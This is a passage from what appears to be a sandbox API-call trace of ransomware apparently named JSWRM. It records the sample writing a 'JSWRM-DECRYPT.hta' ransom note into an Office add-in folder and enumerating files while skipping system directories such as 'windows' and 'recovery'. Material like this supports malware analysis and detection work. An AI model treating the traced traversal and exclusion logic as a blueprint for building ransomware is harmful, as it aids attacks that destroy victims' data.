lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0123.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0123.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\he\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.131] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.131] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.132] CloseHandle (hObject=0x338) returned 1 [0123.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\he\\jswrm-decrypt.hta")) returned 0x20 [0123.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.132] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\he\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x400dbdaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.132] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.132] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x400dbdaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.133] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.133] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.133] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x400dbdaf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x400dbdaf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x400dbdaf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.133] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0123.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0123.133] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.133] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.133] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.133] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.133] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.133] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0123.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0123.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244840 [0123.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.134] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1c8cf9c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1c8cf9c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2aaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.134] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0123.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0123.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0123.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d0d8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0123.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244840 | out: hHeap=0x1e0000) returned 1 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.135] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf41f3e26, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41f3e26, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4266542, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x37aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.135] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.135] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x98040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.135] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.135] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.136] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.136] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.136] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.136] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.136] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.136] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.136] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.136] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0123.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0123.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0123.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0123.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0123.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.136] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x98040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.136] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0123.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0123.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.136] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="hi", cAlternateFileName="")) returned 1 [0123.136] lstrcmpiW (lpString1="hi", lpString2=".") returned 1 [0123.136] lstrcmpiW (lpString1="hi", lpString2="..") returned 1 [0123.136] lstrcmpiW (lpString1="hi", lpString2="...") returned 1 [0123.136] 